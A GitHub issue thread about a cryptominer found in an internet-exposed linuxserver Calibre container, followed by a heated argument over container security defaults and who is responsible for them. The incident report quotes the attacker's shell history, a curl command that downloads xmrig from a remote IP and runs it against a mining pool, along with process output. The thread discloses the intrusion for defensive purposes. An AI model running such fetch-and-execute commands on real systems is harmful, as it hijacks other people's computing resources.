### ISSUE TITLE
Container image potentially compromised with crypto miner

### ISSUE THREAD

**Issue by munen** [linuxserver/docker-calibre#167]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

Dear maintainers,

I wanted to report a security incident involving the linuxserver/calibre image. We discovered unauthorized cryptocurrency mining activity in a container running your image.

The incident:
- Detection: Abnormal 100% CPU usage sustained for ~2 hours
- Found process: Cryptocurrency miner connecting to pool.hashvault.pro:80
- Process was running with user ID 1000

### Expected Behavior

No crypto miner should have had access to the container.

### Steps To Reproduce

#+begin_example
app@basilisk ~ % ps aux | grep apk
1000     2751556  193 59.8 2440988 2401088 ?     Ssl  13:23 487:53 ./apk -o pool.hashvault.pro:80 -u 8BgYPBc41tfgvtMYfw5v6YHAxJb3fFSK9aCqb8F754FUW717ksQQQbnj9LexM18GYpAyWk4fvwLNMX9smajTmiPTA8Z8qcN -p code-server -k --cpu-max-threads-hint=100 --tls -B
#+end_example

#+begin_example
root@basilisk:~# grep 1000 /etc/passwd | wc -l
0
#+end_example

#+begin_example
ls -la /proc/2751556 > incident_process_details.txt
#+end_example

[incident_process_details.txt](https://github.com/user-attachments/files/18230557/incident_process_details.txt)

### Environment

```markdown
- OS: Debian stable
- How docker service was installed:

- Image: linuxserver/calibre (latest tag, deployed on 2024-12-15)
- Setup: Copy/pasted docker-compose.yml in the readme: https://github.com/linuxserver/docker-calibre?tab=readme-ov-file#docker-compose-recommended-click-here-for-more-info
- External exposure: Only port 8081 opened for the web interface
- Host firewall: All other incoming traffic blocked
```

### CPU architecture

x86-64

### Docker creation

```bash
docker compose started via Coolify.
```

### Container logs

```bash
Don't have them anymore, because I deleted the malware as soon as possible.

But I do have logs of what the crypto miner did.

This is what's visible in the directory mount:


root@basilisk:~# cd /path/to/calibre/
root@basilisk:/path/to/calibre# find .
.
./config
./config/.bashrc
./config/ssl
./config/ssl/cert.pem
./config/ssl/cert.key
./config/.bash_history
./config/.dbus
./config/.dbus/session-bus
./config/.dbus/session-bus/d55179169fd04560990f853dd6942dc5-1
./config/.cache
./config/.cache/openbox
./config/.cache/openbox/openbox.log
./config/.cache/openbox/sessions
./config/.cache/mesa_shader_cache
./config/.cache/mesa_shader_cache/index
./config/apk
./config/Calibre Library
./config/.config
./config/.config/procps
./config/.config/openbox
./config/.config/openbox/autostart
./config/.config/openbox/menu.xml
./config/.config/calibre
./config/.config/calibre/server-config.txt
./config/.config/calibre/global.py.json
./config/.config/calibre/plugins
./config/.config/calibre/fonts
./config/.config/calibre/fonts/scanner_cache.json
./config/.config/pulse
./config/.config/pulse/113b1d376f04714a4d9424e36759365a-default-source
./config/.config/pulse/113b1d376f04714a4d9424e36759365a-device-volumes.tdb
./config/.config/pulse/113b1d376f04714a4d9424e36759365a-stream-volumes.tdb
./config/.config/pulse/113b1d376f04714a4d9424e36759365a-card-database.tdb
./config/.config/pulse/113b1d376f04714a4d9424e36759365a-default-sink
./config/.config/pulse/cookie
./config/.XDG
./config/.XDG/dbus-1
./config/.XDG/dbus-1/services
./config/.local
./config/.local/bin
./config/.local/bin/pversion
./config/.local/bin/proot-apps
./config/.local/bin/proot
./config/.local/bin/jq
./config/.local/bin/ncat
```

Conveniently, there was a bash_history which matched what was visible in the system:

```
root@basilisk:/path/to/calibre# cat config/.bash_history
nproc
exit
top
curl -L http://50.248.8.1/manage/shares/test/xmrig -o apk && chmod +x apk && ./apk -o pool.hashvault.pro:80 -u 8BgYPBc41tfgvtMYfw5v6YHAxJb3fFSK9aCqb8F754FUW717ksQQQbnj9LexM18GYpAyWk4fvwLNMX9smajTmiPT
A8Z8qcN -p code-server -k --cpu-max-threads-hint=100 --tls -B
top
```

### Additional information

1. I have verified that the Calibre binary in the container matches the upstream release checksum
2. Similar incidents have been reported in the past with this image
3. The issue appears to be specific to the linuxserver/docker-calibre implementation, as no similar vulnerabilities are reported in upstream Calibre

**Comment by Roxedus** [comment]
https://info.linuxserver.io/issues/2024-10-06-securing-kasm/

The issue is the open port on the internet. The readme recently got a better warning for this; https://github.com/linuxserver/docker-calibre#security

**Comment by Sophist-UK** [comment]
FFS!!!! This is quite literally the worst response to a significant security issue I think I have ever read, and @Roxedus has decided to close this issue without doing ANY mitigating actions so that the default is secure and you have to do something to make it insecure?

1. Prevent a web user from opening a terminal; and

2. Deny web access i.e. don't open the port unless a non-trivial userid (and hopefully a password) is set. If you want then allow a blank userid to be explicitly set to open the port in an unsafe way.

**Comment by j0nnymoe** [comment]
We can only do so much - users should read documentation and not blindly open ports to unprotected containers.

**Comment by aptalca** [comment]
As the issue is caused entirely by the server admin (aka the user), the mitigation steps need to be taken by the server admin as well. The documentation Rox linked outlines the risks as well as the mitigation steps.

If you park your car in a high crime area and leave the keys inside with the doors wide open, you can't blame the manufacturer when it's stolen.

**Comment by Sophist-UK** [comment]
> We can only do so much - users should read documentation and not blindly open ports to unprotected containers.

In this case your "only do so much" is to do ***NOTHING!!!!!***

***IMO, you quite literally could not be any more irresponsible than this.***

> If you park your car in a high crime area and leave the keys inside with the doors wide open, you can't blame the manufacturer when it's stolen.

By your own analogy, as a car manufacturer ***you*** supply a car...

1. With blank keys and expect the owner to know this and to change the locks and keys after the car is delivered.
 
2. With a special button on the console so that if you gain access to the interior you can press the button and gain root access to the cars computer and install your own tracking software.

> The default of any of our kasm-based images is to move the security burden to the user (as we cannot, and will not infer what is acceptable for the user in their infra)

Docker images are used by people with varying levels of sophistication - not everyone has the expertise to know they need to secure it or the knowledge to do so - and the multiple reports of hackers having **actually** installed malware is evidence of this.

Internet router manufacturers also used to supply their routers with a default userid and password that could be used to gain access - they learned ***NOT*** to provide by default an unlocked router, and instead to ensure that you needed physical access to the router to know the default password.

When you say "any of our kasm-based images" does that imply that you take a similarly irresponsible attitude to security in many other docker images?

If you want to be responsible software engineers who act responsibly, you need to do the same:

1. If you by default run the docker container as root, you should require the user to set a non-zero UID/GID for the container and any processes it runs ***BECAUSE IT IS A SECURITY ISSUE TO DO OTHERWISE***.

2. Disable web access unless security credentials are explicitly set ***BECAUSE IT IS A SECURITY ISSUE TO DO OTHERWISE***.

3. Disable the ability to open a terminal unless that ability is explicitly enabled ***BECAUSE IT IS A SECURITY ISSUE TO DO OTHERWISE***.
 
4. (Ideally) disable default SUDO access in such a terminal. However, in mitigation, a) AFAIK this is - **or should be** - SUDO in the docker instance and not SUDO in the base O/S; and b) the docker instance doesn't have full access to the resources outside the container; and c) there may be complications to such a limitation. But it should at least be considered ***BECAUSE IT IS A SECURITY ISSUE TO DO OTHERWISE***.

**Comment by thespad** [comment]
You can yell in all caps as much as you like, it doesn't change the reality of the images, which are providing a full desktop environment to users. 

Disabling web access would render them completely useless and requiring basic auth does very little in a scenario where someone has exposed the container to the internet because it's trivial to brute force in that scenario.

Root is also irrelevant here, any user can curl down xmrig and go nuts. Removing the ability to launch a terminal from the openbox menu makes it slightly more complex to execute an attack but by no means prevents it.

What it comes down to here is that these images are explicitly **NOT** designed to be exposed directly to the internet, we say so repeatedly, because they are, again, full desktop environments running in a container, even if they only have a single app installed OOTB. Yes, there are steps we could take to make them "safer" in that scenario, but we cannot secure them to a point that it would be *safe* to expose them directly to the internet without also rendering them unusable, at which point we would have many times more people yelling at us that the images don't work and demanding we "fix" that.

**Comment by Sophist-UK** [comment]
> You can yell in all caps as much as you like

You can call it yelling - I consider it to be a reasonable stress on just how outrageous your attitude is i.e. it absolutely stinks.

> Disabling web access would render them completely useless and requiring basic auth does very little in a scenario where someone has exposed the container to the internet because it's trivial to brute force in that scenario.

It would be trivial to brute force only because you haven't implemented any security protections.

> Removing the ability to launch a terminal from the openbox menu makes it slightly more complex to execute an attack but by no means prevents it.

Anything is better than nothing.

> it doesn't change the reality of the images, which are providing a full desktop environment to users.

So restrict access by default to the local subnet, and allow the administrator to configure additional subnets or IP addresses that are allowed access.

My point is a simple one - you have done literally nothing proactively to secure the web services, and when security issues were reported you still did nothing and instead simply pointed to a disclaimer and said that it wasn't your responsibility.

IMO - and that would likely be an opinion shared by many security professionals - is that you are failing to recognise your responsibilities to protect your users, and that you do (or should) have a responsibility to make all *reasonable* efforts to add protections. Indeed, perhaps you might contact some recognised security professionals and get their opinions in order to give yourselves a more objective perspective.

**Comment by SThomson29** [comment]
I’m sorry but the outrage over someone exposing their container to WAN it getting interfered with then trying to blame LSIO.

Simple solution is if you don’t know what you’re doing which some of you clearly don’t. Then don’t expose it to the public facing internet.

Play stupid games, win stupid prizes.

**Comment by willisiswillis** [comment]
I think you're missing the bigger picture here. And you didn't even address any of the points I made. 

I don't know what is going on but you and your team's general attitude seems to be to call anybody who makes a mistake names and ridicule them. 

Having worked in security, as a cloud engineer and in both dev and operations, you are 10000% not following industry standards. Least privilege is a standard for a reason. 

You build an ebook application... most of your users are probably not that savvy. 

Call me old fashioned, naive or whatever, but I was always taught to take care of those who are vulnerable. You've effectively 10x'd the exposure of your less technical user base... imagine if Apple, MS or Ubuntu started shipping the OS with no firewall or IP tables rules and said "security is on the customer. Don't connect to the internet unless you know what you're doing. Play stupid games win stupid prizes"... not a good look. 

You and your team can go ahead and throw around insults and make fun of your user base. It's not a good look. 

I don't use your product anyway but here to be responsible and join in with alerting you to major security risks you have consciously decided to expose people to. 

It honestly boggles my mind how the criticism has been received. Anywhere I've ever worked, this kind of attitude and bad building philosophy would've gotten anybody fired yesterday. Seriously. 

I'll go on my way. I've done my part here to help raise the alarm. Hope you guys take a step back, open a feature req or bug and spend a few hours caring about those who don't know better. Literally the only downside here is a few hours of work.

**Comment by thespad** [comment]
> You build an ebook application... most of your users are probably not that savvy.

We *do not* build an ebook application, we *package* an ebook application in a docker image. We document in multiple places that the image is not intended to be exposed to the internet and does not have authentication enabled OOTB, unfortunately some people choose not to read any of the documentation we provide and just wing it.

Forcing http basic auth, which is all we can really do without writing an entire authentication framework - which we do not have resources to do - provides a false sense of security because it is extremely vulnerable to brute-forcing and not suitable for internet-facing uses.

The most practical option we have at the moment is enforcing IP-based restrictions by default, but even that is plagued with potential issues and likely to dump a huge support burden on us if we implement it. 

We're a small team of volunteers, not a commercial entity, not an enterprise, not backed by wads of VC funding, and when people turn up and start screaming at us that everything we do is wrong and we should be ashamed of ourselves it tends to provoke a response.

**Comment by Sophist-UK** [comment]
> We _do not_ build an ebook application, we _package_ an ebook application in a docker image.

That is ***NOT*** an excuse for being absolutely and utterly negligent about security. Whilst it does mean that you are not in control of the base code, you could:

1. Do what you can within your own packaging and scripts and code to eliminate or mitigate these risks;

2. When security issues are raised with you, then you could raise a corresponding issue on the Caliber repo - indeed it could be argued that you have a clear responsibility to do so - but AFAIK you neglected to do that too.

Stop making excuses and start acting responsibly!!!

> Forcing http basic auth, which is all we can really do without writing an entire authentication framework

Not true. You could package a reverse proxy in your docker image in order to:

1. Protect that actual port;
2. Provide enhanced authentication
3. Provide SSL encryption

... but you didn't bother to even consider that.

> The most practical option we have at the moment is enforcing IP-based restrictions by default...

Ah - so now you admit that doing something ***IS*** possible but...

> ... likely to dump a huge support burden on us if we implement it.

... you don't want to have to deal with consequential effort.

So there we have the confession in writing - you can't be bothered to expend the effort.

> We're a small team of volunteers, not a commercial entity, not an enterprise, not backed by wads of VC funding...

So are a huge number of other open source projects, but it doesn't stop them from taking security seriously and acting responsibly.

> and when people turn up and start screaming at us that everything we do is wrong and we should be ashamed of ourselves

1. No one is claiming that *everything* you do is wrong. This is a blatant exaggeration in order to play the role of victim.
 
2. My comments have included a raft of possible suggestions for how you could do something about security - but all you do is falsely ridicule them.

3. Rather than take seriously the situation you created where your users have security breaches because you can't be bothered to take them seriously (THEY are the victims), instead you decide to play the victim yourself and blame users and blame complainers. To be completely blunt, this is an immature attitude like an infant throwing a tantrum.

4. Not a single person has screamed at you for not having dealt with this security issue more sensibly. What we ***are*** screaming at you about is your refusal to take security seriously to even the tiniest degree, and for the attitude that you display when some of us raise our concerns about you not taking security seriously.

**Comment by SThomson29** [comment]
> First, this is 1000% an application layer product. I don't import packages into my code and then say "this is code but I didn't build it so technically it's not really an application"... You have built an app.

It's a containerised application not an "application layer product". This sentence alone clues me into the fact you indeed do not know what you're talking about, the issue here is not the application but how the user has exposed it to the entire world. 

> This has been open source since 2019 so it's been around for a while. I get it. I was writing messy serverless code for 15 hours yesterday. It's work and hours and pride on the line. All anybody is asking is for the core maintainers to address a serious issue. As developers and operators we ALL have the responsibility to protect our users.

In my opinion the core maintainers have addressed the issue, theres clear advice not to expose any of the Kasm based containers to the internet. 

> You don't pile cognitive load on your users. You try to abstract that away for the majority of your user base; that's real ease of use.

This is just word salad and means absolutely nothing. 

> Listen, I don't think anybody here complaining is trying to be petty or argue Reddit style. We're trying to protect others from catastrophe. That's all.

I would suggest then that you read the article about securing KasmVNC based containers and educate anyone who asks rather than whining that the maintainers need to do better. I've linked the article here if this helps. 

https://info.linuxserver.io/issues/2024-10-06-securing-kasm/

> Seriously, just open an issue and get this fixed. It really is a P1 issue and that really belongs with the core maintainers and should not be offloaded with zingers like "push some code, bro".

If you bothered to read the only way to entirely secure these containers to save people from the consequences of their actions, would make the containers unusable. 

> You only have upside with better reputation and safer users. Heck, throw it out there on blast that you made your product safer and take a personal interest in providing your base with common sense protections.

I hate this modern age where everything is the fault of someone else and no one takes accountability for their own actions, which is the kind of thing this sentence calls for. 

> Let's just work together and do some good here. I spent an hour walking a dude through how to sanitize and recover his network. Let's just all pull in the same direction. We let you know why this is serious and now there is your entire user base that needs you to fix it even if most of them don't have a clue.

You've missed the part where theres already a PSA on this, it has already been taken seriously and further understanding is required from a container users perspective if they want to expose it to the internet. 


I'm sick of this attitude where because I played about with something I didn't understand and got burnt, it's the person who supplied me with the matches fault and not my own. Thanks for listening and again just an FYI zero affiliation with Lsio just someone who uses their base container images. 

Funnily enough though I've never been xmrigged, I wonder why.

**Comment by Sophist-UK** [comment]
> I have a vast background in IT Infrastructure and was always taught to only expose something to the internet if you absolutely have to and if you absolutely have to make sure you understand how it works and how to harden it.

Exactly - the people who create Docker containers for far less experienced users to use should act responsibly and harden the container.

> If people have enough knowledge to spin up containers and expose them to the internet. Then quite frankly they should have enough knowledge to know better in my opinion.

That is actually the opposite of what logic would say. Those who have enough knowledge to create a packaged docker container have enough knowledge to know better than to allow unhardened ports without a user of the container explicitly enabling them to internet access, and to harden against someone opening a terminal that they can use to hack the system. The user of the packaged container should NOT be expected to have that knowledge.

> At the point where you set an allow rule through a firewall to an internal service, the onus is on you to have reviewed your internal service, understand how it works and harden it if required.

Actually, no. A lot of people know enough that they need a firewall, and enough that they should open only specific ports they need, but nowhere near enough to know that the creators of the docker container have A) been stupid enough to leave a port wide open to a hacker opening a sudo terminal, and B) negligent enough to allow this to continue even after the security issue has been formally reported.

> It's a containerised application not an "application layer product". This sentence alone clues me into the fact you indeed do not know what you're talking about, the issue here is not the application but how the user has exposed it to the entire world.

That is one perspective. Another perspective is that the creators of the container have created an insecure container that allows a web user to open a sudo terminal. There is literally no way in any common sense world to justify that as a sensible thing rather than negligence.

> https://info.linuxserver.io/issues/2024-10-06-securing-kasm/

Thank you for this link. We now know that the KasmVNC team have adopted the same cavalier attitude across the board and that there are actually 55 different containers that they have created which are negligently insecure.

**Comment by SThomson29** [comment]
I think you missed the part where I said I'm not an LSIO maintainer cause you keep referring to me as doing nothing, like I said just a user of their images.  

> Eventually, someone will take a financial loss and perhaps sue you - and they will use this discussion as evidence of your negligence and quite possibly the court will decide that an obscure PSA is not sufficient for them to consider you have taken this seriously, and then they might end up owning your homes and cars and 401Ks etc.

And a court would laugh them out the door, because they did something without understanding, against instructions because they thought they knew better. Except maybe somewhere like America where they cater towards this culture of "My actions are someone elses fault because they didn't do something that prevents me from being dumb."

Just admit it you made a mistake, and you can't accept the consequences of your mistake and are looking for someone to blame.

**Comment by aptalca** [comment]
Lsio team member here

This discussion is going off the rails and is not the least bit productive. We have spent countless hours discussing this internally in the past and continue to do so. We have also spent many hours improving the documentation and the code. You are entitled to your opinion about how `the devs don't care about security`, but we don't share it.

> I don't use your product anyway

> You could package a reverse proxy in your docker image

Comments like the above make me realize some of you are not at all familiar with our images, infrastructure and offerings, which may explain the disconnect in this thread.

We are always open to constructive feedback and are always looking for ways to improve our images while maintaining a balance between security and usability.

The reverse proxy inclusion suggestion is . . . not at all something we would consider, to put it bluntly.

We provide a home grown reverse proxy solution [SWAG](https://github.com/linuxserver/docker-swag) which not only is very easy to set up, but also includes almost turn key support for various auth mechanisms like Authelia, Authentik, and http auth (combined with Fail2ban with an out of the box active brute force filter). It includes built in proxy confs for most of the images we publish, as well as other popular 3rd party apps and containers. If you use the [auto proxy mod](https://github.com/linuxserver/docker-mods/tree/swag-auto-proxy) for SWAG, all it takes is 2 labels added to the calibre container (`swag=enable` and `swag_auth=authelia`) to securely publish it behind Authelia with 2fa. We have tons of documentation and blog posts about it and we promote it heavily.

We also provide a Wireguard container with multiple blog posts detailing how it can be used to access homelab services without publishing them publicly. Some people combine that with SWAG.

With that said, let me summarize some of the key points that are seemingly missed here.

- Using the example `docker run` or `compose yaml` we provide here to deploy on a machine on lan does _not_ make this container susceptible to xmrig hacks (unless you put your machine in DMZ, in which case only a deity can help you, or if your lan is already compromised, in which case the xmrig is likely the least of your issues)
- Most VPSes like on AWS, DO, etc. have external firewalls that block ports by default. OCI goes one step further and implements both an external firewall managed through the OCI console, but it also uses iptables inside the VM to block all ports. Deploying this container in such an environment with our sample config does _not_ make it susceptible to xmrig hacks
- This container allows for setting http auth via an environment variable aptly named `PASSWORD`, which is referenced in the readme
- The readme has plenty of notices about not exposing it on the internet without auth
- We have other documentation, blog posts and cstate notices about the issue

In a nutshell, the user has to go out of their way and take additional steps to expose it online without auth, making it vulnerable. By default, this container is not vulnerable.

If a user is doing additional things to make themselves vulnerable (self harming), there is not much we can do. Any action by us to prevent the small number of users from doing such things, would make things more difficult for the majority of our users (who actually do read the documentation and follow the instructions), raise the barrier of entry and increase our support burden. Cost to benefit ratio becomes too high.

And once you go down that line, where does it end? Add a reverse proxy? Force 2fa? Do you want us to put it on a specialty hardware with root zfs encryption and sell it as a secure appliance? Oh wait, anything with an ethernet port can be hacked. What about the keyboard and mouse? What if they get a keylogger? We should remove all io ports/devices. Force the container so it won't even start if there is a kb/mouse attached? Force it to only run on an airgapped machine?

There is no such thing as total security. The goal is to find a balance between security and usability.

In this case, the out of the box experience is secure enough and is usable. If you have suggestions on how to reliably increase security without significantly compromising usability, we are all ears. But adding a reverse proxy to the image ain't it. IP based solutions are not reliable methods. We'd appreciate the suggesters to at least be familiar with the code and infrastructure so they're not throwing out random ideas that are infeasible or not applicable.

`Do better` and `Seriously, what would it take to fix this and protect your user base? A day to a week's worth of work?` types of comments have zero value in this thread. Please refrain from emotional arguments with no technical basis as this is not a political debate.

PS. xmrig runs in user space and wastes some cpu cycles, heat and power. A devil's advocate can make the case that getting xmrigged is probably one of the best things that can happen to a self harming user as it is largely harmless, but can teach them to be more responsible with self hosting in the future.

**Comment by rippleFCL** [comment]
Shouldn't this be an issue on the upstream application insted of here?

**Comment by Sophist-UK** [comment]
Yes - as I have said before, any vulnerabilities in the upstream application (like lack of secure web authentication) should be reported as an issue upstream. I do NOT believe, for example, that I can open a sudo terminal from a web client connecting to a normal workstation calibre install (but I may be wrong).

But any vulnerabilities that have been introduced by the containerisation need to be addressed by the container developers as discussed here.

**Comment by Sophist-UK** [comment]
> I think you missed the part where I said I'm not an LSIO maintainer cause you keep referring to me as doing nothing, like I said just a user of their images.

No - I had spotted that - I just forgot to change that particular paragraph so it said "them" instead of "you".

> Except maybe somewhere like America where they cater towards this culture of "My actions are someone elses fault because they didn't do something that prevents me from being dumb."

My own impression of the USA is that it is full of self-righteous, pompous, selfish individualists entirely lacking in empathy or compassion who go around saying that everyone has to know everything about about everything and look out for themselves, and if they make a mistake because it is all too complicated then they have only themselves to blame and have to live with the consequences. Hence the loud-mouthed conservatives who say that people are homeless or starving or ill through poor personal choices without any thought that it might have been because e.g. they are suffering from PTSD having been in the armed services or because they lost their job during Covid and couldn't afford rent or to keep their car, and so now cannot get a job because they are homeless and can't get a home because they are jobless. But rather than having some empathy and compassion and given a helping hand to get themselves out of the hole they are in, instead their benefits are cut and they are made even worse off.

And now, we potentially have entered the realm of politics, though I would argue that the above paragraph is still an ethical statement rather than a political one.

**Comment by aptalca** [comment]
> So what you are saying is that the correct balance between security and usability (in your opinion) is all usability and zero security?

No, not what I'm saying at all.

It has become clear that no amount of explanation we provide will be satisfactory and this thread is unlikely to yield a productive technical discussion and/or any improvements. 

Your concerns have been duly noted. Let's agree to disagree.

Closing, locking and moving on.
